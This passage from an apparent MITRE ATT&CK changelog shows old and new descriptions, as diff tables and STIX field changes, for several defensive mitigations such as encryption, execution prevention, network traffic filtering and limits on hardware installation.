- Use Case: Disable or remove older versions of software that no longer receive updates or security patches (e.g., legacy Java, Adobe Flash).
- Implementation: A company removes Flash Player from all employee systems after it has reached its end-of-life date.
Disable Unused Features:
- Use Case: Turn off unnecessary operating system features like SMBv1, Telnet, or RDP if they are not required.
- Implementation: Disable SMBv1 in a Windows environment to mitigate vulnerabilities like EternalBlue.
Control Applications Installed by Users:
- Use Case: Prevent users from installing unauthorized software via group policies or other management tools.
- Implementation: Block user installations of unauthorized file-sharing applications (e.g., BitTorrent clients) in an enterprise environment.
Remove Unnecessary Services:
- Use Case: Identify and disable unnecessary default services running on endpoints, servers, or network devices.
- Implementation: Disable unused administrative shares (e.g., C$, ADMIN$) on workstations.
Restrict Add-ons and Plugins:
- Use Case: Remove or disable browser plugins and add-ons that are not needed for business purposes.
- Implementation: Disable Java and ActiveX plugins in web browsers to prevent drive-by attacks.
|
| x_mitre_version | 1.1 | 1.2 |
[M1055] Do Not Mitigate
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | This category is to associate techniques that mitigation mig | t | The Do Not Mitigate category highlights scenarios where atte |
| ht increase risk of compromise and therefore mitigation is n | | mpting to mitigate a specific technique may inadvertently in |
| ot recommended. | | crease the organization's security risk or operational insta |
| | | bility. This could happen due to the complexity of the syste |
| | | m, the integration of critical processes, or the potential f |
| | | or introducing new vulnerabilities. Instead of direct mitiga |
| | | tion, these situations may call for alternative strategies s |
| | | uch as detection, monitoring, or response. The Do Not Mitiga |
| | | te category underscores the importance of assessing the trad |
| | | e-offs between mitigation efforts and overall system integri |
| | | ty. This mitigation can be implemented through the following |
| | | measures: Complex Systems Where Mitigation is Risky: - In |
| | | terpretation: In certain systems, direct mitigation could in |
| | | troduce new risks, especially if the system is highly interc |
| | | onnected or complex, such as in legacy industrial control sy |
| | | stems (ICS). Patching or modifying these systems could resul |
| | | t in unplanned downtime, disruptions, or even safety risks. |
| | | - Use Case: In a power grid control system, attempting to pa |
| | | tch or disable certain services related to device communicat |
| | | ions might disrupt critical operations, leading to unintende |
| | | d service outages. Risk of Reducing Security Coverage: - I |
| | | nterpretation: In some cases, mitigating a technique might r |
| | | educe the visibility or effectiveness of other security cont |
| | | rols, limiting an organization’s ability to detect broader a |
| | | ttacks. - Use Case: Disabling script execution on a web serv |
| | | er to mitigate potential PowerShell-based attacks could inte |
| | | rfere with legitimate administrative operations that rely on |
| | | scripting, while attackers may still find alternate ways to |
| | | execute code. Introduction of New Vulnerabilities: - Inte |
| | | rpretation: In highly sensitive or tightly controlled enviro |
| | | nments, implementing certain mitigations might create vulner |
| | | abilities in other parts of the system. For instance, disabl |
| | | ing default security mechanisms in an attempt to resolve com |
| | | patibility issues may open the system to exploitation. - Use |
| | | Case: Disabling certificate validation to resolve internal |
| | | communication issues in a secure environment could lead to m |
| | | an-in-the-middle attacks, creating a greater vulnerability t |
| | | han the original problem. Negative Impact on Performance an |
| | | d Availability: - Interpretation: Mitigations that involve |
| | | removing or restricting system functionalities can have unin |
| | | tended consequences for system performance and availability. |
| | | Some mitigations, while effective at blocking certain attac |
| | | ks, may introduce performance bottlenecks or compromise esse |
| | | ntial operations. - Use Case: Implementing high levels of en |
| | | cryption to mitigate data theft might result in significant |
| | | performance degradation in systems handling large volumes of |
| | | real-time transactions. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-07-23 14:44:24.727000+00:00 | 2024-12-10 19:25:57.870000+00:00 |
| description | This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended. | The Do Not Mitigate category highlights scenarios where attempting to mitigate a specific technique may inadvertently increase the organization's security risk or operational instability. This could happen due to the complexity of the system, the integration of critical processes, or the potential for introducing new vulnerabilities. Instead of direct mitigation, these situations may call for alternative strategies such as detection, monitoring, or response. The Do Not Mitigate category underscores the importance of assessing the trade-offs between mitigation efforts and overall system integrity. This mitigation can be implemented through the following measures:
Complex Systems Where Mitigation is Risky:
- Interpretation: In certain systems, direct mitigation could introduce new risks, especially if the system is highly interconnected or complex, such as in legacy industrial control systems (ICS). Patching or modifying these systems could result in unplanned downtime, disruptions, or even safety risks.
- Use Case: In a power grid control system, attempting to patch or disable certain services related to device communications might disrupt critical operations, leading to unintended service outages.
Risk of Reducing Security Coverage:
- Interpretation: In some cases, mitigating a technique might reduce the visibility or effectiveness of other security controls, limiting an organization’s ability to detect broader attacks.
- Use Case: Disabling script execution on a web server to mitigate potential PowerShell-based attacks could interfere with legitimate administrative operations that rely on scripting, while attackers may still find alternate ways to execute code.
Introduction of New Vulnerabilities:
- Interpretation: In highly sensitive or tightly controlled environments, implementing certain mitigations might create vulnerabilities in other parts of the system. For instance, disabling default security mechanisms in an attempt to resolve compatibility issues may open the system to exploitation.
- Use Case: Disabling certificate validation to resolve internal communication issues in a secure environment could lead to man-in-the-middle attacks, creating a greater vulnerability than the original problem.
Negative Impact on Performance and Availability:
- Interpretation: Mitigations that involve removing or restricting system functionalities can have unintended consequences for system performance and availability. Some mitigations, while effective at blocking certain attacks, may introduce performance bottlenecks or compromise essential operations.
- Use Case: Implementing high levels of encryption to mitigate data theft might result in significant performance degradation in systems handling large volumes of real-time transactions. |
| x_mitre_version | 1.0 | 1.1 |
[M1041] Encrypt Sensitive Information
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Protect sensitive information with strong encryption. | t | Protect sensitive information at rest, in transit, and durin |
| | | g processing by using strong encryption algorithms. Encrypti |
| | | on ensures the confidentiality and integrity of data, preven |
| | | ting unauthorized access or tampering. This mitigation can b |
| | | e implemented through the following measures: Encrypt Data |
| | | at Rest: - Use Case: Use full-disk encryption or file-level |
| | | encryption to secure sensitive data stored on devices. - Im |
| | | plementation: Implement BitLocker for Windows systems or Fil |
| | | eVault for macOS devices to encrypt hard drives. Encrypt Da |
| | | ta in Transit: - Use Case: Use secure communication protoco |
| | | ls (e.g., TLS, HTTPS) to encrypt sensitive data as it travel |
| | | s over networks. - Implementation: Enable HTTPS for all web |
| | | applications and configure mail servers to enforce STARTTLS |
| | | for email encryption. Encrypt Backups: - Use Case: Ensure |
| | | that backup data is encrypted both during storage and transf |
| | | er to prevent unauthorized access. - Implementation: Encrypt |
| | | cloud backups using AES-256 before uploading them to Amazon |
| | | S3 or Google Cloud. Encrypt Application Secrets: - Use Ca |
| | | se: Store sensitive credentials, API keys, and configuration |
| | | files in encrypted vaults. - Implementation: Use HashiCorp |
| | | Vault or AWS Secrets Manager to manage and encrypt secrets. |
| | | Database Encryption: - Use Case: Enable Transparent Data E |
| | | ncryption (TDE) or column-level encryption in database manag |
| | | ement systems. - Implementation: Use MySQL’s built-in encryp |
| | | tion features to encrypt sensitive database fields such as s |
| | | ocial security numbers. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-06-11 16:43:44.834000+00:00 | 2025-04-02 17:28:57.029000+00:00 |
| description | Protect sensitive information with strong encryption. | Protect sensitive information at rest, in transit, and during processing by using strong encryption algorithms. Encryption ensures the confidentiality and integrity of data, preventing unauthorized access or tampering. This mitigation can be implemented through the following measures:
Encrypt Data at Rest:
- Use Case: Use full-disk encryption or file-level encryption to secure sensitive data stored on devices.
- Implementation: Implement BitLocker for Windows systems or FileVault for macOS devices to encrypt hard drives.
Encrypt Data in Transit:
- Use Case: Use secure communication protocols (e.g., TLS, HTTPS) to encrypt sensitive data as it travels over networks.
- Implementation: Enable HTTPS for all web applications and configure mail servers to enforce STARTTLS for email encryption.
Encrypt Backups:
- Use Case: Ensure that backup data is encrypted both during storage and transfer to prevent unauthorized access.
- Implementation: Encrypt cloud backups using AES-256 before uploading them to Amazon S3 or Google Cloud.
Encrypt Application Secrets:
- Use Case: Store sensitive credentials, API keys, and configuration files in encrypted vaults.
- Implementation: Use HashiCorp Vault or AWS Secrets Manager to manage and encrypt secrets.
Database Encryption:
- Use Case: Enable Transparent Data Encryption (TDE) or column-level encryption in database management systems.
- Implementation: Use MySQL’s built-in encryption features to encrypt sensitive database fields such as social security numbers. |
| x_mitre_version | 1.0 | 1.1 |
[M1039] Environment Variable Permissions
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Prevent modification of environment variables by unauthorize | t | Restrict the modification of environment variables to author |
| d users and groups. | | ized users and processes by enforcing strict permissions and |
| | | policies. This ensures the integrity of environment variabl |
| | | es, preventing adversaries from abusing or altering them for |
| | | malicious purposes. This mitigation can be implemented thro |
| | | ugh the following measures: Restrict Write Access: - Use C |
| | | ase: Set file system-level permissions to restrict access to |
| | | environment variable configuration files (e.g., `.bashrc`, |
| | | `.bash_profile`, `.zshrc`, `systemd` service files). - Imple |
| | | mentation: Configure `/etc/environment` or `/etc/profile` on |
| | | Linux systems to only allow root or administrators to modif |
| | | y the file. Secure Access Controls: - Use Case: Limit acce |
| | | ss to environment variable settings in application deploymen |
| | | t tools or CI/CD pipelines to authorized personnel. - Implem |
| | | entation: Use role-based access control (RBAC) in tools like |
| | | Jenkins or GitLab to ensure only specific users can modify |
| | | environment variables. Restrict Process Scope: - Use Case: |
| | | Configure policies to ensure environment variables are only |
| | | accessible to the processes they are explicitly intended fo |
| | | r. - Implementation: Use containerized environments like Doc |
| | | ker to isolate environment variables to specific containers |
| | | and ensure they are not inherited by other processes. Audit |
| | | Environment Variable Changes: - Use Case: Enable logging f |
| | | or changes to critical environment variables. - Implementati |
| | | on: Use `auditd` on Linux to monitor changes to files like ` |
| | | /etc/environment` or application-specific environment files. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-06-11 16:40:14.543000+00:00 | 2024-12-11 17:54:05.697000+00:00 |
| description | Prevent modification of environment variables by unauthorized users and groups. | Restrict the modification of environment variables to authorized users and processes by enforcing strict permissions and policies. This ensures the integrity of environment variables, preventing adversaries from abusing or altering them for malicious purposes. This mitigation can be implemented through the following measures:
Restrict Write Access:
- Use Case: Set file system-level permissions to restrict access to environment variable configuration files (e.g., `.bashrc`, `.bash_profile`, `.zshrc`, `systemd` service files).
- Implementation: Configure `/etc/environment` or `/etc/profile` on Linux systems to only allow root or administrators to modify the file.
Secure Access Controls:
- Use Case: Limit access to environment variable settings in application deployment tools or CI/CD pipelines to authorized personnel.
- Implementation: Use role-based access control (RBAC) in tools like Jenkins or GitLab to ensure only specific users can modify environment variables.
Restrict Process Scope:
- Use Case: Configure policies to ensure environment variables are only accessible to the processes they are explicitly intended for.
- Implementation: Use containerized environments like Docker to isolate environment variables to specific containers and ensure they are not inherited by other processes.
Audit Environment Variable Changes:
- Use Case: Enable logging for changes to critical environment variables.
- Implementation: Use `auditd` on Linux to monitor changes to files like `/etc/environment` or application-specific environment files. |
| x_mitre_version | 1.0 | 1.1 |
[M1038] Execution Prevention
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Block execution of code on a system through application cont | t | Prevent the execution of unauthorized or malicious code on s |
| rol, and/or script blocking. | | ystems by implementing application control, script blocking, |
| | | and other execution prevention mechanisms. This ensures tha |
| | | t only trusted and authorized code is executed, reducing the |
| | | risk of malware and unauthorized actions. This mitigation c |
| | | an be implemented through the following measures: Applicati |
| | | on Control: - Use Case: Use tools like AppLocker or Windows |
| | | Defender Application Control (WDAC) to create whitelists of |
| | | authorized applications and block unauthorized ones. On Lin |
| | | ux, use tools like SELinux or AppArmor to define mandatory a |
| | | ccess control policies for application execution. - Implemen |
| | | tation: Allow only digitally signed or pre-approved applicat |
| | | ions to execute on servers and endpoints. (e.g., `New-AppLoc |
| | | kerPolicy -PolicyType Enforced -FilePath "C:\Policies\AppLoc |
| | | ker.xml"`) Script Blocking: - Use Case: Use script contr |
| | | ol mechanisms to block unauthorized execution of scripts, su |
| | | ch as PowerShell or JavaScript. Web Browsers: Use browser ex |
| | | tensions or settings to block JavaScript execution from untr |
| | | usted sources. - Implementation: Configure PowerShell to enf |
| | | orce Constrained Language Mode for non-administrator users. |
| | | (e.g., `Set-ExecutionPolicy AllSigned`) Executable Blockin |
| | | g: - Use Case: Prevent execution of binaries from suspiciou |
| | | s locations, such as `%TEMP%` or `%APPDATA%` directories. - |
| | | Implementation: Block execution of `.exe`, `.bat`, or `.ps1` |
| | | files from user-writable directories. Dynamic Analysis Pre |
| | | vention: - Use Case: Use behavior-based execution prevention |
| | | tools to identify and block malicious activity in real time |
| | | . - Implemenation: Employ EDR solutions that analyze runtime |
| | | behavior and block suspicious code execution. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-17 18:53:48.791000+00:00 | 2024-12-11 18:10:27.976000+00:00 |
| description | Block execution of code on a system through application control, and/or script blocking. | Prevent the execution of unauthorized or malicious code on systems by implementing application control, script blocking, and other execution prevention mechanisms. This ensures that only trusted and authorized code is executed, reducing the risk of malware and unauthorized actions. This mitigation can be implemented through the following measures:
Application Control:
- Use Case: Use tools like AppLocker or Windows Defender Application Control (WDAC) to create whitelists of authorized applications and block unauthorized ones. On Linux, use tools like SELinux or AppArmor to define mandatory access control policies for application execution.
- Implementation: Allow only digitally signed or pre-approved applications to execute on servers and endpoints. (e.g., `New-AppLockerPolicy -PolicyType Enforced -FilePath "C:\Policies\AppLocker.xml"`)
Script Blocking:
- Use Case: Use script control mechanisms to block unauthorized execution of scripts, such as PowerShell or JavaScript. Web Browsers: Use browser extensions or settings to block JavaScript execution from untrusted sources.
- Implementation: Configure PowerShell to enforce Constrained Language Mode for non-administrator users. (e.g., `Set-ExecutionPolicy AllSigned`)
Executable Blocking:
- Use Case: Prevent execution of binaries from suspicious locations, such as `%TEMP%` or `%APPDATA%` directories.
- Implementation: Block execution of `.exe`, `.bat`, or `.ps1` files from user-writable directories.
Dynamic Analysis Prevention:
- Use Case: Use behavior-based execution prevention tools to identify and block malicious activity in real time.
- Implemenation: Employ EDR solutions that analyze runtime behavior and block suspicious code execution. |
| x_mitre_version | 1.2 | 1.3 |
[M1050] Exploit Protection
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Use capabilities to detect and block conditions that may lea | t | Deploy capabilities that detect, block, and mitigate conditi |
| d to or be indicative of a software exploit occurring. | | ons indicative of software exploits. These capabilities aim |
| | | to prevent exploitation by addressing vulnerabilities, monit |
| | | oring anomalous behaviors, and applying exploit-mitigation t |
| | | echniques to harden systems and software. Operating System |
| | | Exploit Protections: - Use Case: Enable built-in exploit pr |
| | | otection features provided by modern operating systems, such |
| | | as Microsoft's Exploit Protection, which includes technique |
| | | s like Data Execution Prevention (DEP), Address Space Layout |
| | | Randomization (ASLR), and Control Flow Guard (CFG). - Imple |
| | | mentation: Enforce DEP for all programs and enable ASLR to r |
| | | andomize memory addresses used by system and application pro |
| | | cesses. Windows: Configure Exploit Protection through the Wi |
| | | ndows Security app or deploy settings via Group Policy. `Exp |
| | | loitProtectionExportSettings.exe -path "exploit_settings.xml |
| | | "` Linux: Use Kernel-level hardening features like SELinux, |
| | | AppArmor, or GRSEC to enforce memory protections and prevent |
| | | exploits. Third-Party Endpoint Security: - Use Case: Use |
| | | endpoint protection tools with built-in exploit protection, |
| | | such as enhanced memory protection, behavior monitoring, and |
| | | real-time exploit detection. - Implementation: Deploy tools |
| | | to detect and block exploitation attempts targeting unpatch |
| | | ed software. Virtual Patching: - Use Case: Use tools to imp |
| | | lement virtual patches that mitigate vulnerabilities in appl |
| | | ications or operating systems until official patches are app |
| | | lied. - Implementation: Use Intrusion Prevention System (IPS |
| | | ) to block exploitation attempts on known vulnerabilities in |
| | | outdated applications. Hardening Application Configuration |
| | | s: - Use Case: Disable risky application features that can |
| | | be exploited, such as macros in Microsoft Office or JScript |
| | | in Internet Explorer. - Implementation: Configure Microsoft |
| | | Office Group Policies to disable execution of macros in down |
| | | loaded files. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-20 20:22:55.938000+00:00 | 2024-12-11 19:22:37.296000+00:00 |
| description | Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring. | Deploy capabilities that detect, block, and mitigate conditions indicative of software exploits. These capabilities aim to prevent exploitation by addressing vulnerabilities, monitoring anomalous behaviors, and applying exploit-mitigation techniques to harden systems and software.
Operating System Exploit Protections:
- Use Case: Enable built-in exploit protection features provided by modern operating systems, such as Microsoft's Exploit Protection, which includes techniques like Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control Flow Guard (CFG).
- Implementation: Enforce DEP for all programs and enable ASLR to randomize memory addresses used by system and application processes. Windows: Configure Exploit Protection through the Windows Security app or deploy settings via Group Policy.
`ExploitProtectionExportSettings.exe -path "exploit_settings.xml"`
Linux: Use Kernel-level hardening features like SELinux, AppArmor, or GRSEC to enforce memory protections and prevent exploits.
Third-Party Endpoint Security:
- Use Case: Use endpoint protection tools with built-in exploit protection, such as enhanced memory protection, behavior monitoring, and real-time exploit detection.
- Implementation: Deploy tools to detect and block exploitation attempts targeting unpatched software.
Virtual Patching:
- Use Case: Use tools to implement virtual patches that mitigate vulnerabilities in applications or operating systems until official patches are applied.
- Implementation: Use Intrusion Prevention System (IPS) to block exploitation attempts on known vulnerabilities in outdated applications.
Hardening Application Configurations:
- Use Case: Disable risky application features that can be exploited, such as macros in Microsoft Office or JScript in Internet Explorer.
- Implementation: Configure Microsoft Office Group Policies to disable execution of macros in downloaded files. |
| x_mitre_version | 1.1 | 1.2 |
[M1037] Filter Network Traffic
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Use network appliances to filter ingress or egress traffic a | t | Employ network appliances and endpoint software to filter in |
| nd perform protocol-based filtering. Configure software on e | | gress, egress, and lateral network traffic. This includes pr |
| ndpoints to filter network traffic. | | otocol-based filtering, enforcing firewall rules, and blocki |
| | | ng or restricting traffic based on predefined conditions to |
| | | limit adversary movement and data exfiltration. This mitigat |
| | | ion can be implemented through the following measures: Ingr |
| | | ess Traffic Filtering: - Use Case: Configure network firewa |
| | | lls to allow traffic only from authorized IP addresses to pu |
| | | blic-facing servers. - Implementation: Limit SSH (port 22) a |
| | | nd RDP (port 3389) traffic to specific IP ranges. Egress Tr |
| | | affic Filtering: - Use Case: Use firewalls or endpoint secu |
| | | rity software to block unauthorized outbound traffic to prev |
| | | ent data exfiltration and command-and-control (C2) communica |
| | | tions. - Implementation: Block outbound traffic to known mal |
| | | icious IPs or regions where communication is unexpected. Pr |
| | | otocol-Based Filtering: - Use Case: Restrict the use of spe |
| | | cific protocols that are commonly abused by adversaries, suc |
| | | h as SMB, RPC, or Telnet, based on business needs. - Impleme |
| | | ntation: Disable SMBv1 on endpoints to prevent exploits like |
| | | EternalBlue. Network Segmentation: - Use Case: Create net |
| | | work segments for critical systems and restrict communicatio |
| | | n between segments unless explicitly authorized. - Implement |
| | | ation: Implement VLANs to isolate IoT devices or guest netwo |
| | | rks from core business systems. Application Layer Filtering |
| | | : - Use Case: Use proxy servers or Web Application Firewall |
| | | s (WAFs) to inspect and block malicious HTTP/S traffic. - Im |
| | | plementation: Configure a WAF to block SQL injection attempt |
| | | s or other web application exploitation techniques. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-17 18:54:05.785000+00:00 | 2024-12-11 19:43:03.354000+00:00 |
| description | Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic. | Employ network appliances and endpoint software to filter ingress, egress, and lateral network traffic. This includes protocol-based filtering, enforcing firewall rules, and blocking or restricting traffic based on predefined conditions to limit adversary movement and data exfiltration. This mitigation can be implemented through the following measures:
Ingress Traffic Filtering:
- Use Case: Configure network firewalls to allow traffic only from authorized IP addresses to public-facing servers.
- Implementation: Limit SSH (port 22) and RDP (port 3389) traffic to specific IP ranges.
Egress Traffic Filtering:
- Use Case: Use firewalls or endpoint security software to block unauthorized outbound traffic to prevent data exfiltration and command-and-control (C2) communications.
- Implementation: Block outbound traffic to known malicious IPs or regions where communication is unexpected.
Protocol-Based Filtering:
- Use Case: Restrict the use of specific protocols that are commonly abused by adversaries, such as SMB, RPC, or Telnet, based on business needs.
- Implementation: Disable SMBv1 on endpoints to prevent exploits like EternalBlue.
Network Segmentation:
- Use Case: Create network segments for critical systems and restrict communication between segments unless explicitly authorized.
- Implementation: Implement VLANs to isolate IoT devices or guest networks from core business systems.
Application Layer Filtering:
- Use Case: Use proxy servers or Web Application Firewalls (WAFs) to inspect and block malicious HTTP/S traffic.
- Implementation: Configure a WAF to block SQL injection attempts or other web application exploitation techniques. |
| x_mitre_version | 1.1 | 1.2 |
[M1035] Limit Access to Resource Over Network
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Prevent access to file shares, remote access to systems, unn | t | Restrict access to network resources, such as file shares, r |
| ecessary services. Mechanisms to limit access may include us | | emote systems, and services, to only those users, accounts, |
| e of network concentrators, RDP gateways, etc. | | or systems with a legitimate business requirement. This can |
| | | include employing technologies like network concentrators, R |
| | | DP gateways, and zero-trust network access (ZTNA) models, al |
| | | ongside hardening services and protocols. This mitigation ca |
| | | n be implemented through the following measures: Audit and |
| | | Restrict Access: - Regularly audit permissions for file sha |
| | | res, network services, and remote access tools. - Remove unn |
| | | ecessary access and enforce least privilege principles for u |
| | | sers and services. - Use Active Directory and IAM tools to r |
| | | estrict access based on roles and attributes. Deploy Secure |
| | | Remote Access Solutions: - Use RDP gateways, VPN concentra |
| | | tors, and ZTNA solutions to aggregate and secure remote acce |
| | | ss connections. - Configure access controls to restrict conn |
| | | ections based on time, device, and user identity. - Enforce |
| | | MFA for all remote access mechanisms. Disable Unnecessary S |
| | | ervices: - Identify running services using tools like netst |
| | | at (Windows/Linux) or Nmap. - Disable unused services, such |
| | | as Telnet, FTP, and legacy SMB, to reduce the attack surface |
| | | . - Use firewall rules to block traffic on unused ports and |
| | | protocols. Network Segmentation and Isolation: - Use VLANs |
| | | , firewalls, or micro-segmentation to isolate critical netwo |
| | | rk resources from general access. - Restrict communication b |
| | | etween subnets to prevent lateral movement. Monitor and Log |
| | | Access: - Monitor access attempts to file shares, RDP, and |
| | | remote network resources using SIEM tools. - Enable auditin |
| | | g and logging for successful and failed attempts to access r |
| | | estricted resources. *Tools for Implementation* File Share |
| | | Management: - Microsoft Active Directory Group Policies - |
| | | Samba (Linux/Unix file share management) - AccessEnum (Windo |
| | | ws access auditing tool) Secure Remote Access: - Microsoft |
| | | Remote Desktop Gateway - Apache Guacamole (open-source RDP/ |
| | | VNC gateway) - Zero Trust solutions: Tailscale, Cloudflare Z |
| | | ero Trust Service and Protocol Hardening: - Nmap or Nessus |
| | | for network service discovery - Windows Group Policy Editor |
| | | for disabling SMBv1, Telnet, and legacy protocols - iptable |
| | | s or firewalld (Linux) for blocking unnecessary traffic Net |
| | | work Segmentation: - pfSense for open-source network isolat |
| | | ion |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-09 20:51:00.027000+00:00 | 2024-12-18 15:50:51.212000+00:00 |
| description | Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc. | Restrict access to network resources, such as file shares, remote systems, and services, to only those users, accounts, or systems with a legitimate business requirement. This can include employing technologies like network concentrators, RDP gateways, and zero-trust network access (ZTNA) models, alongside hardening services and protocols. This mitigation can be implemented through the following measures:
Audit and Restrict Access:
- Regularly audit permissions for file shares, network services, and remote access tools.
- Remove unnecessary access and enforce least privilege principles for users and services.
- Use Active Directory and IAM tools to restrict access based on roles and attributes.
Deploy Secure Remote Access Solutions:
- Use RDP gateways, VPN concentrators, and ZTNA solutions to aggregate and secure remote access connections.
- Configure access controls to restrict connections based on time, device, and user identity.
- Enforce MFA for all remote access mechanisms.
Disable Unnecessary Services:
- Identify running services using tools like netstat (Windows/Linux) or Nmap.
- Disable unused services, such as Telnet, FTP, and legacy SMB, to reduce the attack surface.
- Use firewall rules to block traffic on unused ports and protocols.
Network Segmentation and Isolation:
- Use VLANs, firewalls, or micro-segmentation to isolate critical network resources from general access.
- Restrict communication between subnets to prevent lateral movement.
Monitor and Log Access:
- Monitor access attempts to file shares, RDP, and remote network resources using SIEM tools.
- Enable auditing and logging for successful and failed attempts to access restricted resources.
*Tools for Implementation*
File Share Management:
- Microsoft Active Directory Group Policies
- Samba (Linux/Unix file share management)
- AccessEnum (Windows access auditing tool)
Secure Remote Access:
- Microsoft Remote Desktop Gateway
- Apache Guacamole (open-source RDP/VNC gateway)
- Zero Trust solutions: Tailscale, Cloudflare Zero Trust
Service and Protocol Hardening:
- Nmap or Nessus for network service discovery
- Windows Group Policy Editor for disabling SMBv1, Telnet, and legacy protocols
- iptables or firewalld (Linux) for blocking unnecessary traffic
Network Segmentation:
- pfSense for open-source network isolation |
| x_mitre_version | 1.0 | 1.1 |
[M1034] Limit Hardware Installation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Block users or groups from installing or using unapproved ha | t | Prevent unauthorized users or groups from installing or usin |
| rdware on systems, including USB devices. | | g hardware, such as external drives, peripheral devices, or |
| | | unapproved internal hardware components, by enforcing hardwa |
| | | re usage policies and technical controls. This includes disa |
| | | bling USB ports, restricting driver installation, and implem |
| | | enting endpoint security tools to monitor and block unapprov |
| | | ed devices. This mitigation can be implemented through the f |
| | | ollowing measures: Disable USB Ports and Hardware Installat |
| | | ion Policies: - Use Group Policy Objects (GPO) to disable U |
| | | SB mass storage devices: - Navigate to Computer Configu |
| | | ration > Administrative Templates > System > Removable Stora |
| | | ge Access. - Deny write and read access to USB devices. |
| | | - Whitelist approved devices using unique serial numbers vi |
| | | a Windows Device Installation Policies. Deploy Endpoint Pro |
| | | tection and Device Control Solutions: - Use tools like Micr |
| | | osoft Defender for Endpoint, Symantec Endpoint Protection, o |
| | | r Tanium to monitor and block unauthorized hardware. - Imple |
| | | ment device control policies to allow specific hardware type |
| | | s (e.g., keyboards, mice) and block others. Harden BIOS/UEF |
| | | I and System Firmware: - Set strong passwords for BIOS/UEFI |
| | | access. - Enable Secure Boot to prevent rogue hardware comp |
| | | onents from loading unauthorized firmware. Restrict Periphe |
| | | ral Devices and Drivers: - Use Windows Device Manager Polic |
| | | ies to block installation of unapproved drivers. - Monitor h |
| | | ardware installation attempts through endpoint monitoring to |
| | | ols. Disable Bluetooth and Wireless Hardware: - Use GPO or |
| | | MDM tools to disable Bluetooth and Wi-Fi interfaces across |
| | | systems. - Restrict hardware pairing to approved devices onl |
| | | y. Logging and Monitoring: - Enable logging for hardware i |
| | | nstallation events in Windows Event Logs (Event ID 20001 for |
| | | Device Setup Manager). - Use SIEM solutions (e.g., Splunk, |
| | | Elastic Stack) to detect unauthorized hardware installation |
| | | activities. *Tools for Implementation* USB and Device Cont |
| | | rol: - Microsoft Group Policy Objects (GPO) - Microsoft Def |
| | | ender for Endpoint - Symantec Endpoint Protection - McAfee D |
| | | evice Control Endpoint Monitoring: - EDRs - OSSEC (open-so |
| | | urce host-based IDS) Hardware Whitelisting: - BitLocker fo |
| | | r external drives (Windows) - Windows Device Installation Po |
| | | licies - Device Control BIOS/UEFI Security: - Secure Boot |
| | | (Windows/Linux) Firmware management tools like Dell Command |
| | | Update or HP Sure Start |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-09 20:48:12.326000+00:00 | 2024-12-18 16:09:24.873000+00:00 |
| description | Block users or groups from installing or using unapproved hardware on systems, including USB devices. | Prevent unauthorized users or groups from installing or using hardware, such as external drives, peripheral devices, or unapproved internal hardware components, by enforcing hardware usage policies and technical controls. This includes disabling USB ports, restricting driver installation, and implementing endpoint security tools to monitor and block unapproved devices. This mitigation can be implemented through the following measures:
Disable USB Ports and Hardware Installation Policies:
- Use Group Policy Objects (GPO) to disable USB mass storage devices:
- Navigate to Computer Configuration > Administrative Templates > System > Removable Storage Access.
- Deny write and read access to USB devices.
- Whitelist approved devices using unique serial numbers via Windows Device Installation Policies.
Deploy Endpoint Protection and Device Control Solutions:
- Use tools like Microsoft Defender for Endpoint, Symantec Endpoint Protection, or Tanium to monitor and block unauthorized hardware.
- Implement device control policies to allow specific hardware types (e.g., keyboards, mice) and block others.
Harden BIOS/UEFI and System Firmware:
- Set strong passwords for BIOS/UEFI access.
- Enable Secure Boot to prevent rogue hardware components from loading unauthorized firmware.
Restrict Peripheral Devices and Drivers:
- Use Windows Device Manager Policies to block installation of unapproved drivers.
- Monitor hardware installation attempts through endpoint monitoring tools.
Disable Bluetooth and Wireless Hardware:
- Use GPO or MDM tools to disable Bluetooth and Wi-Fi interfaces across systems.
- Restrict hardware pairing to approved devices only.
Logging and Monitoring:
- Enable logging for hardware installation events in Windows Event Logs (Event ID 20001 for Device Setup Manager).
- Use SIEM solutions (e.g., Splunk, Elastic Stack) to detect unauthorized hardware installation activities.
*Tools for Implementation*
USB and Device Control:
- Microsoft Group Policy Objects (GPO)
- Microsoft Defender for Endpoint
- Symantec Endpoint Protection
- McAfee Device Control
Endpoint Monitoring:
- EDRs
- OSSEC (open-source host-based IDS)
Hardware Whitelisting:
- BitLocker for external drives (Windows)
- Windows Device Installation Policies
- Device Control
